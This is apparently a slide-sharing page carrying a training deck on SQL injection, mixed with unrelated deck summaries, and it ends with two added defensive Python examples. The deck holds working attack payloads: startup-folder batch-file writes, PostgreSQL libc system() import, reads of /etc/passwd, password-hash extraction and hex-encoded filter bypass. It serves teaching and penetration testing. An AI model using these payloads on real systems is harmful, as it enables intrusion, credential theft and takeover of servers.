The document provides an overview of structured query language (SQL) and SQL injection. It discusses SQL queries including SELECT, INSERT, UPDATE, DELETE statements. It also covers identifying the database platform, combining rows, SQL injection cheat sheets, bypassing input validation filters, and troubleshooting SQL injection attacks on various platforms including PostgreSQL, DB2, Informix and Ingres.
Show the reader the potential damage that a SQL injection vulnerability can make. Show evading techniques to some filters. Show some common mistakes that the programmers make when protecting their sites. Show the best practices to protect your code.
Advanced Topics On Sql Injection Protection - amiable_indian
The document discusses various methods for preventing SQL injection attacks, including input validation, using static query statements, and least privilege approaches. It provides detailed explanations and examples of how to properly implement input validation, including escaping special characters, validating numeric fields, and preventing second-order SQL injection. The document also cautions that approaches like parameterized statements and stored procedures do not automatically prevent SQL injection and can still be vulnerable if not implemented correctly.
The document discusses various techniques for exploiting SQL injection vulnerabilities, including classical and blind SQL injection. It provides examples of exploiting SQL injection on different database management systems like MySQL, PostgreSQL, Oracle, and Microsoft SQL Server. It also discusses methods for bypassing web application firewalls during SQL injection attacks.
The document discusses SQL injection vulnerabilities. It begins by explaining what SQL is and how it is used to interact with databases. It then discusses how SQL injection works by exploiting vulnerabilities in web applications that construct SQL queries using external input. The document provides an overview of methodology for testing for and exploiting SQL injection vulnerabilities, including input validation, information gathering, exploiting true conditions, interacting with the operating system, using the command prompt, and escalating privileges.
SQL injection exploitation internals: How do I exploit this web application injection point?
These slides have been presented at a private conference in London on January 9, 2009.
A pragmatic approach to different SQL Injection techniques such as Stacked statements, Tautology based, Union based, Error based, Second Order and Blind SQL Injection coherently explaining the path behind these attacks including tips and tricks to make them more likely to work in real life.
Also I will show you ways to avoid weak defenses as black listing and quote filtering as well as how privilege escalation may take place from this sort of vulnerabilities.
There will be a live demonstration where you can catch on some handy tools and actually see blind sql injection working efficiently with the latest techniques showing you why this type of SQL injection shouldn't be taken any less seriously than any other.
Finally, a word on countermeasures and real solutions to prevent these attacks, what you should do and what you should not.
http://videos.sapo.pt/ZvwITnTBMzD8HYvEZrov (video)
SQL Injection: complete walkthrough (not only) for PHP developers - Krzysztof Kotowicz
Learn what is SQL injection, how to use prepared statements, how to escape and write secure stored procedures. Many PHP projects are covered - PDO, Propel, Doctrine, Zend Framework and MDB2. Multiple gotchas included.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the Front Range OWASP Conference in Denver on March 5, 2009.
Advanced SQL injection to operating system full control (slides) - Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
These slides have been presented at Black Hat Europe conference in Amsterdam on April 16, 2009.
The document discusses SQL injection attacks and how they work. SQL injection occurs when user input is inserted directly into an SQL query string without proper validation or escaping. This allows attackers to alter the structure of the intended SQL query and potentially gain unauthorized access to sensitive data or make unauthorized changes to the database. The document provides examples of vulnerable queries and how attackers can exploit them to inject malicious SQL code. It also lists some common techniques used in SQL injection attacks and provides recommendations for preventing SQL injection vulnerabilities.
The most massive crime of identity theft in history was perpetrated in 2007 by exploiting an SQL Injection vulnerability. This issue is one of the most common and most serious threats to web application security. In this presentation, you'll see some common myths busted and you'll get a better understanding of defending against SQL injection.
This document discusses SQL injection and ways to prevent it. SQL injection occurs when malicious SQL statements are inserted into an insufficiently validated string that is later executed as a database command. It can allow attackers to read or modify data in the database. The document outlines different types of SQL injection attacks and provides examples of how input validation and prepared statements can prevent injection. It also discusses command injection and file path traversal attacks.
This document discusses SQL injection vulnerabilities and techniques for exploiting them. It covers:
1) What SQL injection is and how it works by exploiting vulnerabilities in web applications.
2) A methodology for testing for and exploiting SQL injection vulnerabilities, including information gathering, exploiting boolean logic, extracting data, and escalating privileges.
3) Specific techniques for each step like determining the database type, exploring the database structure, grabbing passwords, and creating new database accounts.
This document provides an agenda and overview for a talk on exploiting SQL injections from web applications against Oracle databases. The talk covers topics like PL/SQL vs SQL injection, extracting data, privilege escalation, OS code execution, second order attacks, and tools for exploitation like Bsqlbf. It discusses challenges like limitations of SQL in Oracle and lack of documentation. Examples are provided for various exploits like using DBMS_EXPORT_EXTENSION and DBMS_JAVA_TEST functions to escalate privileges or execute OS commands.
SQL Injection in action with PHP and MySQL - Pradeep Kumar
A hands-on example for SQL injection using PHP and MySQL
It also offers an overview of how it gets into our applications and how we can overcome SQL Injection.
This document discusses SQL injection attacks and how to mitigate them. It begins by explaining how injection attacks work by tricking applications into executing unintended commands. It then provides examples of how SQL injection can be used to conduct unauthorized access and data modification attacks. The document discusses techniques for finding and exploiting SQL injection vulnerabilities, including through the SELECT, INSERT, UPDATE and UNION commands. It also covers ways to mitigate injection attacks, such as using prepared statements with bound parameters instead of concatenating strings.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.
Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.
Advanced SQL injection to operating system full control (whitepaper) - Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
This document discusses SQL injection attacks and how to prevent them. It describes different types of SQL injection like blind SQL injection and union-based injection. It provides examples of vulnerable code and how attackers can exploit it. Finally, it recommends best practices for prevention, including using parameterized queries, stored procedures, input validation, and secure configuration.
For more course tutorials visit
www.tutorialrank.com
CIS 336 Final Exam Guide
1) Joe works for a company where the IT department charges him for the number of CRM login accounts that are in his department. What type of IT funding model is his company deploying?
What is advanced SQL Injection? Infographic - JW CyberNerd
This document discusses SQL injection and advanced SQL injection techniques. SQL injection allows attackers to pass SQL commands through a web application to exploit vulnerabilities and gain unauthorized access to databases. Advanced SQL injection goes further by compromising the underlying operating system and network. Attackers can use SQL injection to bypass authentication, disclose information, compromise data integrity and availability, execute remote code, enumerate databases and columns, conduct network reconnaissance, and more. The document encourages learning advanced SQL injection to exploit web applications and compromise security.
SQL injection is a code injection technique that exploits vulnerabilities in database-driven web applications. It occurs when user input is not validated or sanitized for string literal escape characters that are part of SQL statements. This allows attackers to interfere with the queries and obtain unauthorized access to sensitive data or make changes to the database. The document then provides step-by-step instructions on how to scan for vulnerabilities, determine database details like name and tables, extract data like user credentials, bypass protections like magic quotes, and use tools to automate the process.
The sqlite3 command line tool allows users to interactively evaluate SQL queries and view results. It can be used to create and populate databases, view table schemas and data, and dump tables to SQL files. The tool supports meta commands for output formatting, running SQL scripts, and more. Configuration options are also available to set defaults via a resource file or command line flags.
An overview of techniques for defending against SQL Injection using Python tools. This slide deck was presented at the DC Python Meetup on October 4th, 2011 by Edgar Roman, Sr Director of Application Development at PBS.
This document provides a tutorial on SQL injection, including:
- Explaining what SQL injection is and how it works by exploiting vulnerabilities in database queries
- Steps to test for SQL injection vulnerabilities like determining the database type and getting environment information
- Methods for extracting data through SQL injection like getting database, table, and column names and record data
- Recommending the use of automated SQL injection scanning tools like WebCruiser to more efficiently test for and exploit SQL injection vulnerabilities
- Instructions for setting up sample PHP/MySQL and ASP/SQL Server testing environments to practice SQL injection techniques
The document discusses various software testing techniques including black-box testing which focuses on inputs and outputs without seeing internal code, and white-box testing which considers internal logic and structures. Different levels of testing are covered from unit to acceptance testing. Strategies for effective test case design such as equivalence partitioning and boundary value analysis are also presented.
This document discusses data cubes, which are multidimensional data structures used in online analytical processing (OLAP) to enable fast retrieval of data organized by dimensions and measures. Data cubes can have 2-3 dimensions or more and contain measures like costs or units. Key concepts are slicing to select a 2D page, dicing to define a subcube, and rotating to change dimensional orientation. Data cubes represent categories through dimensions and levels, and store facts as measures in cells. They can be pre-computed fully, not at all, or partially to balance query speed and memory usage. Totals can also be stored to improve performance of aggregate queries.
This document provides an introduction and overview of the DBM630: Data Mining and Data Warehousing course. It outlines the course syllabus, textbooks, assessment tasks, schedule, prerequisites, and provides a high-level introduction to data mining and data warehousing concepts including definitions, processes, applications and evolution of database technologies.
The document discusses several case studies and applications of data mining including:
1) Customer attrition prediction helped a mobile phone company reduce attrition rates from over 2%/month to under 1.5%/month.
2) Credit risk models used by banks to predict loan defaults enabled proliferation of mortgages and credit cards.
3) Amazon's product recommendations were successful by clustering customers based on products purchased.
4) A case study of MetLife found $30 million in fraudulent insurance claims through data mining of a $50 million consolidated database within companies worldwide to detect fraud like rate evasion faster than manual methods.
This document discusses various classification and prediction techniques including Naive Bayes classification, regression, and support vector machines (SVM). It covers topics such as Naive Bayes assumptions, dealing with missing data, numeric attributes, and Bayesian belief networks. Statistical modeling approaches like Naive Bayes make independence assumptions between attributes. Regression can be used for numerical prediction problems.
This document discusses data mining concepts including data preprocessing and postprocessing. It covers the differences between data mining, machine learning, and statistics. Data mining aims to discover knowledge from data in an automatic or semi-automatic way. Both data mining and machine learning use techniques to generalize from data, but data mining focuses more on gaining knowledge rather than just prediction. Data preprocessing techniques like cleaning, integration, and transformation are used to engineer the input data. Data postprocessing techniques combine multiple models to engineer the output.
4. Structured Query Language (SQL): SQL was originally developed at IBM in early 1970. It was not formalized until 1986, by the American National Standards Institute (ANSI). We use the SQL standard defined by the International Organization for Standardization (ISO). 2/04/2011 CHAPTER 10 4
5. SQL Queries
SQL queries are made up of one or more SQL statements that are effectively instructions for the database server to carry out. A query may include a conditional clause (WHERE) to target specific rows in a table. The OR and AND operators are used when multiple conditions are to be evaluated.
SELECT Statement
SELECT * FROM tblUsers;
SELECT * INTO hackerTable FROM tblusers;
UNION Operator
SELECT username, password FROM tblUsers UNION SELECT username, password FROM tblAdmins;
SELECT username, password FROM tblUsers UNION ALL SELECT username, password FROM tblAdmins;
6. SQL Queries (cont.)
INSERT Statement
INSERT INTO tblUsers VALUES (5,'john','smith',0);
INSERT INTO tblUsers(id, username, password, priv) VALUES (5, 'john','smith',0);
UPDATE Statement
UPDATE tblUsers SET priv=0 WHERE username = 'sarah';
DELETE Statement
DELETE FROM tblUsers WHERE username = 'admin';
7. SQL Queries (cont.)
Notes from the Underground…
SELECT story FROM news WHERE id=19;
SELECT story FROM news WHERE id=19 OR 1=1;
SELECT story FROM news WHERE id=19 OR 1=2;
UPDATE tblUsers SET password='letmein' WHERE emailaddress='someuser@victim.com';
UPDATE tblUsers SET password='letmein' WHERE emailaddress='' or 1=1';
8. SQL Queries (cont.)
DROP Statement
DROP TABLE tblusers;
CREATE TABLE Statement
CREATE TABLE shoppinglist(item int, name varchar(100));
CREATE TABLE shoppinglist as select * from dba_users;
ORDER BY Clause
SELECT cost, product FROM orders ORDER BY cost DESC;
9. SQL Queries (cont.)
ALTER TABLE Statement
ALTER TABLE tblUsers ADD comments varchar(100);
ALTER TABLE tblUsers DROP COLUMN comments;
ALTER TABLE tblUsers ALTER COLUMN comments varchar(500);
GROUP BY Statement
SELECT customer, SUM(cost) FROM orders WHERE customer = 'Anthony Anteater' GROUP BY customer;
12. SQL Injection Quick Reference: the most common SQL queries and techniques we will need when exploiting an SQL injection vulnerability. Identify the database platform. SQL injection cheat sheet.
13. Identifying the Database Platform: Web server platform and scripting language. IIS + ASP.NET => SQL Server. Apache + PHP => MySQL. Etc. But we need a more scientific approach…
14. Identifying the Database Platform: Time delay inference is a long-standing method of identifying the database platform. Or: submitting "heavy queries" designed to consume the processor for a measurable length of time.
16. Identify the Database
For example, if we suspect that the database platform is either Microsoft SQL Server or Oracle:
' AND 'ahmed' || 'ali' = 'ahmedali'--
' AND 'ahmed' + 'ali' = 'ahmedali'--
17. Combining Multiple Rows: Only one column and one row can be returned at a time. To bypass this restriction it is possible to concatenate all rows and columns into a single string.
19. Combining Multiple Rows
SELECT sys.stragg (distinct username||';') FROM all_users; -- Returns all usernames on a single line
20. Cheat Sheets: a quick reference of common SQL statements used in SQL injection attacks against Oracle and MySQL.
21. Cheat Sheet PHP and Ruby on Rails applications. Configuration Information and Schema
23. Attacking the Database Server
System Command Execution
It is possible to execute operating system commands by creating a malicious script file on the target server.
SELECT 'system_commands' INTO dumpfile trojanpath
SELECT 'net user x x ' into dumpfile 'c:\Documents and Settings\All Users\Start Menu\Programs\Startup\attack.bat'
24. Cracking Database Passwords: Extract user password hashes from the mysql.user table. SELECT concat(user,":",password) FROM mysql.user Password hashes can then be cracked using http://hashcrack.com/ www.openwall.com/john/ Attacking the Database Server
25. Attacking the Database Directly: Execute code by directly connecting to the MySQL server and creating a user-defined function. We can download a tool to perform this attack. Windows: ww.scoobygang.org/HiDDenWarez/mexec.pl Windows: www.0xdeadbeef.info/exploits/raptor_winudf.tgz Attacking the Database Server
26. File Read/Write: The MySQL LOAD_FILE function returns a string containing the contents of a specified file. The database user requires the file_priv privilege to invoke this function. SELECT LOAD_FILE('/etc/passwd'); We can use a tool called SqlDumper to read file contents via blind SQL injection. Attacking the Database Server
30. Attacking the Database Server: There are two different types of injection in Oracle. Traditional SQL injection: only a single SQL statement. PL/SQL injection: execute entire PL/SQL blocks.
31. More than 100 Oracle tables contain password information. Sometimes the passwords are available as clear text. Cracking Database Passwords
34. Oracle password hashes can then be cracked using a variety of freely available tools, such as Woraauthbf, John the Ripper, Gsauditor, Checkpwd, and Cain & Abel. Cracking Database Passwords
36. Bypassing Input Validation Filters: You can bypass input validation filters that rely on rejecting known bad characters and string literals by encoding your input. Quote Filters: The single-quote character (') is synonymous with SQL injection attacks. The idea behind this approach is to prevent the attacker from breaking out of quote-delimited data.
38. Quote Filters (cont.)
Microsoft SQL Server also allows you to build your query within a variable and then call EXEC to execute it. In the following example, the query SELECT 'ABC' is placed into the variable @q via a HEX-encoded string:
DECLARE @q varchar(8000)
SELECT @q=0x53454c454354202741424327
EXEC(@q)
You can use the following Perl script to automatically encode SQL statements using this technique:
40. HTTP Encoding You can sometimes bypass input validation filters that reject known bad characters (often referred to as blacklisting).
44. Troubleshooting SQL Injection Attacks: The table lists some of the common challenges and errors that are frequently encountered when attempting to exploit an SQL injection flaw across various platforms.
51. SQL Injection on Other Platforms. This section is intended to provide a quick reference for other, less common platforms, such as PostgreSQL, DB2, Informix, and Ingres. PostgreSQL: Extracting the PostgreSQL Database Configuration Information:
53. Blind SQL Injection Function: Attacking the Database Server: PostgreSQL
PostgreSQL does not offer a built-in procedure for executing operating system commands, but it is possible to import functions such as system() from an external .dll or Shared Object (.so) file.
System Command Execution: import the system function from the standard UNIX libc library:
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT;
The system function can then be called by executing the following SQL query:
SELECT system('command');
54. Local File Access: Local files can be read by the superuser account using the following SQL:
CREATE TABLE filedata(t text);
COPY filedata FROM '/etc/passwd'; --
It is also possible to write local files using the following SQL:
CREATE TABLE thefile(evildata text);
INSERT INTO thefile(evildata) VALUES ('some evil data');
COPY thefile (evildata) TO '/tmp/evilscript.sh';
Cracking Database Passwords: PostgreSQL passwords are hashed using the MD5 algorithm:
select usename||':'||passwd from pg_shadow;
55. DB2 Cheat Sheet : The DB2 database server from IBM is perhaps one of the least popular database platforms to find integrated with a Web application. Extracting the PostgreSQL Database Configuration Information:
57. Informix Cheat Sheet : The Informix database server is distributed by IBM and is not commonly encountered when compared to other database platforms. Extracting the Informix Database Configuration Information:
59. Ingres Cheat Sheet: The Ingres database is an open source database available for all major operating systems. Ingres is one of the least popular databases to find integrated with a Web application. Extracting the Ingres Database Configuration Information:
61. Microsoft Access: Microsoft Access databases do not scale well with enterprise applications, and therefore are usually encountered only when the application has minimal database requirements. Brett Moore of insomniasec.com has published an excellent paper on SQL injection with Microsoft Access which you can find here: www.insomniasec.com/publications/Access-Through-Access.pdf
62. Resources:
SQL Injection White Papers
■ "Advanced SQL Injection" by Victor Chapela: www.owasp.org/index.php/Image:Advanced_SQL_Injection.ppt
■ "Advanced SQL Injection in SQL Server Applications" by Chris Anley: www.ngssoftware.com/papers/advanced_sql_injection.pdf
■ "Buffer Truncation Abuse in .NET and Microsoft SQL Server" by Gary O'Leary-Steele: http://scanner.sec-1.com/resources/bta.pdf
■ "Access through Access" by Brett Moore: www.insomniasec.com/publications/Access-Through-Access.pdf
■ "Time-Based Blind SQL Injection with Heavy Queries" by Chema Alonso: http://technet.microsoft.com/en-us/library/cc512676.aspx
SQL Injection Cheat Sheets
■ PentestMonkey.com SQL injection cheat sheets for Oracle, Microsoft SQL Server, MySQL, PostgreSQL, Ingres, DB2, and Informix: http://pentestmonkey.net/cheat-sheets/
■ Michaeldaw.org SQL injection cheat sheets for Sybase, MySQL, Oracle, PostgreSQL, DB2, and Ingres: http://michaeldaw.org/sql-injection-cheat-sheet/
■ Ferruh Mavituna cheat sheets for MySQL, SQL Server, PostgreSQL, and Oracle: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
■ Ferruh Mavituna cheat sheets for Oracle: http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/
63. SQL Injection Exploit Tools: BSQL Hacker is a relatively new player in the SQL injection exploit world. The tool is a Windows-based GUI application that supports Microsoft SQL Server, Oracle, and MySQL. BSQL Hacker supports blind and error-based SQL injection techniques: http://labs.portcullis.co.uk/application/bsql-hacker/ The Sec-1 Automagic SQL injection (SASI) tool is a Microsoft SQL Server exploit tool written in Perl: http://scanner.sec-1.com/resources/sasi.zip
65. Solutions Fast Track: Structured Query Language (SQL) Primer: SQL comprises a feature-rich set of statements, operators, and clauses designed to interact with a database server. The most common SQL statements are SELECT, INSERT, UPDATE, DELETE, and DROP. The majority of SQL injection vulnerabilities occur when user-supplied data is included in the WHERE clause portion of a SELECT statement. The UPDATE and DELETE statements rely on a WHERE clause to determine which records are modified or deleted. When injecting SQL into either an UPDATE or a DELETE statement it is important to understand how your input could affect the database. Avoid injecting OR 1=1 or any other condition that returns true into either of these statements.
Editor's Notes
This will be valid for most database platforms. Where necessary I will highlight platform-specific variations to the standard.
The primary role of the SELECT statement is to retrieve data from a database and return it to the application or user. Microsoft SQL Server also allows you to use SELECT statements to read table data from one table and insert it into another. You use the UNION operator to combine the result sets of two or more SELECT statements. All SELECT statements within the union must return the same number of columns and their data types must be compatible. To permit duplicates and prevent the database from comparing the returned data, use UNION ALL SELECT.
Use the INSERT statement to insert data into a table. The most significant problem with this approach is that if the table structure is changed (e.g., columns are added or deleted) data could be written to the wrong column. Use the UPDATE statement to modify existing data within a database table. All UPDATE statements should include a WHERE clause to indicate which rows should be updated, or all rows are affected. Use the DELETE statement to delete rows from a table. All DELETE statements should include a WHERE clause to indicate which rows should be deleted.
Use the DROP statement to delete database objects such as tables, views, indexes, and users. Use the CREATE TABLE statement to create a new table in the current database or schema. INTEGER or INT: a 32-bit signed integer value. Oracle allows you to create a table and populate it with data from another table or view. Use the ORDER BY clause to sort the results of a SELECT statement by a specific column.
You can use the ALTER TABLE statement to add, delete, or modify a column within an existing table. Use the GROUP BY statement when performing an aggregate function such as SUM against a column in a table.
When performing SQL injection attacks you will often need to limit the number of table rows returned by your injected query (e.g., when extracting data via error messages). The syntax for selecting a specific row from a table varies among database platforms. Table details the SQL syntax for selecting the first and fifth rows from the tblUsers table.
Mohammed Siddiq continues
The single-quote character is often filtered or doubled up as a defense mechanism. This strategy fails when the vulnerable user input is a numeric value, and therefore is not delimited using quote characters.
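The quote-filter note above and the Solutions Fast Track warning about WHERE clauses in UPDATE statements, worked through as an added example that is not part of the original slides. It uses Python's sqlite3 module as a stand-in database; the table rows, the function names and the row-count cap are assumptions made for the illustration.

```python
import re
import sqlite3


def make_db():
    """In-memory stand-in for the slides' tblUsers table; rows are constructed."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblUsers (id INTEGER PRIMARY KEY, username TEXT, "
               "password TEXT, priv INTEGER)")
    db.executemany(
        "INSERT INTO tblUsers (id, username, password, priv) VALUES (?, ?, ?, ?)",
        [(1, "admin", "x", 1), (2, "sarah", "y", 1), (5, "john", "smith", 1)])
    db.commit()
    return db


def privs(db):
    """Current id -> priv mapping, used to see how far an UPDATE reached."""
    return dict(db.execute("SELECT id, priv FROM tblUsers"))


def double_quotes(value):
    """The quote filter from the notes: double every single quote."""
    return value.replace("'", "''")


def demote_by_name_concat(db, username):
    """String context: the filtered value stays inside the quoted literal."""
    sql = ("UPDATE tblUsers SET priv=0 WHERE username='"
           + double_quotes(username) + "'")
    return db.execute(sql).rowcount


def demote_by_id_concat(db, user_id):
    """Numeric context: nothing delimits the value, so the filter is a no-op."""
    sql = "UPDATE tblUsers SET priv=0 WHERE id=" + double_quotes(user_id)
    return db.execute(sql).rowcount


def demote_by_id_bound(db, user_id, max_rows=1):
    """Hardened form: allow-list the number, bind it, cap the rows touched."""
    if not re.fullmatch(r"[0-9]{1,9}", user_id):
        raise ValueError("id must be a decimal integer")
    cur = db.execute("UPDATE tblUsers SET priv=0 WHERE id=?", (int(user_id),))
    if cur.rowcount > max_rows:
        db.rollback()  # undo an UPDATE that reached further than intended
        raise RuntimeError("UPDATE matched %d rows" % cur.rowcount)
    db.commit()
    return cur.rowcount


if __name__ == "__main__":
    db = make_db()
    # The slide's string input is neutralised by quote doubling: 0 rows change.
    print("string context :", demote_by_name_concat(db, "' or 1=1"), privs(db))
    # The slide's numeric form contains no quote at all: every row changes.
    print("numeric context:", demote_by_id_concat(db, "5 OR 1=1"), privs(db))
    db = make_db()
    try:
        demote_by_id_bound(db, "5 OR 1=1")
    except ValueError as exc:
        print("bound, rejected:", exc)
    print("bound, valid id:", demote_by_id_bound(db, "5"), privs(db))
```

The row count returned by the concatenated numeric query is the signal to watch for in application logs: a single-record update that reports every row in the table.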
The DUAL dummy table (as it is sometimes called) is an automatically generated table assigned to SYS, but accessible to all users. It is useful because it always exists, and has a single row, which is handy for SELECT statements with constant expressions. You could just as easily do this with any other table with a single row, but using DUAL makes it portable among all Oracle installations. Example:
SELECT 1+1 FROM DUAL;
1+1
----------
2
In the following example, we have created a variable named @q and placed the query SELECT 'ABC' into it via a HEX-encoded string.
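For reviewing logged statements that use the @q pattern described in this note, the following added example (not from the original slides) decodes hexadecimal literals so that a reviewer or detection rule sees the text that EXEC would run. The log lines are constructed samples, and the function names and the four-byte minimum are assumptions.

```python
import re

# A 0x literal of at least four bytes; shorter ones are usually plain numbers.
HEX_LITERAL = re.compile(r"0x((?:[0-9A-Fa-f]{2}){4,})")
DYNAMIC_EXEC = re.compile(r"\bEXEC(?:UTE)?\s*\(", re.IGNORECASE)
SQL_VERB = re.compile(
    r"\b(SELECT|INSERT|UPDATE|DELETE|DROP|CREATE|ALTER|EXEC)\b", re.IGNORECASE)

# Constructed sample statements, as they might appear in a query log.
SAMPLE_LOG = [
    "DECLARE @q varchar(8000) SELECT @q=0x53454c454354202741424327 EXEC(@q)",
    "SELECT story FROM news WHERE id=19",
    "INSERT INTO files(header) VALUES (0x89504e470d0a1a0a)",
]


def decode_hex_literals(statement):
    """Return the text form of every hex literal found in the statement."""
    decoded = []
    for match in HEX_LITERAL.finditer(statement):
        raw = bytes.fromhex(match.group(1))
        # nvarchar data is UTF-16LE: ASCII text shows up as byte, 0x00, byte, 0x00.
        if len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
            decoded.append(raw.decode("utf-16-le"))
        else:
            decoded.append(raw.decode("latin-1"))
    return decoded


def review(statement):
    """Flag statements that hide SQL text in a hex literal and run it via EXEC."""
    decoded = decode_hex_literals(statement)
    dynamic = bool(DYNAMIC_EXEC.search(statement))
    hidden_sql = [text for text in decoded if SQL_VERB.search(text)]
    return {"decoded": decoded, "dynamic_exec": dynamic,
            "flag": dynamic and bool(hidden_sql)}


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(review(line)["flag"], review(line)["decoded"])
```

A keyword filter applied to the first sample as received sees only the declaration and the hex digits; the decoded form is what the database actually executes.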
by encoding your input using exotic encoding standards or via double encoding.
The table lists common SQL metacharacters in a number of encoded formats.
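Why a bad-character filter has to run on the canonical form of the input, shown as an added example that is not part of the original slides. It assumes the value is checked as it arrives on the wire (one layer of percent-encoding is normal); the sample values, the verdict strings and the three-pass limit are constructed for the illustration.

```python
import re
from urllib.parse import unquote

METACHARS = re.compile(r"['\";]|--|/\*")
NONSTANDARD_ESCAPE = re.compile(r"%u[0-9A-Fa-f]{4}")  # not decoded by unquote()


def blacklist_on_raw(value):
    """The filter the slides describe, applied to the value exactly as received.
    Returns True when the value is accepted."""
    return METACHARS.search(value) is None


def canonicalize(raw, max_layers=3):
    """Percent-decode until the value stops changing.
    Returns (canonical value, number of encoding layers removed)."""
    value = raw
    for layers in range(max_layers + 1):
        decoded = unquote(value)
        if decoded == value:
            return value, layers
        value = decoded
    raise ValueError("value still changing after %d decode passes" % max_layers)


def check(raw):
    """Canonicalize first, then validate; refuse anything encoded more than once."""
    try:
        value, layers = canonicalize(raw)
    except ValueError:
        return "reject: encoding depth"
    if layers > 1:
        return "reject: multiply encoded"
    if NONSTANDARD_ESCAPE.search(value):
        return "reject: non-standard escape"
    if METACHARS.search(value):
        return "reject: metacharacter"
    return "accept"


if __name__ == "__main__":
    # Constructed sample values: a surname with an apostrophe in several encodings.
    for sample in ["obrien", "o%27brien", "o%2527brien", "o%u0027brien", "50%25"]:
        print("%-14s raw filter accepts: %-5s canonical check: %s"
              % (sample, blacklist_on_raw(sample), check(sample)))
```

The raw filter accepts every sample because none contains a literal quote, while the canonical check rejects the three encoded forms; the fourth sample, a literal percent sign, shows that legitimate single-encoded input still passes.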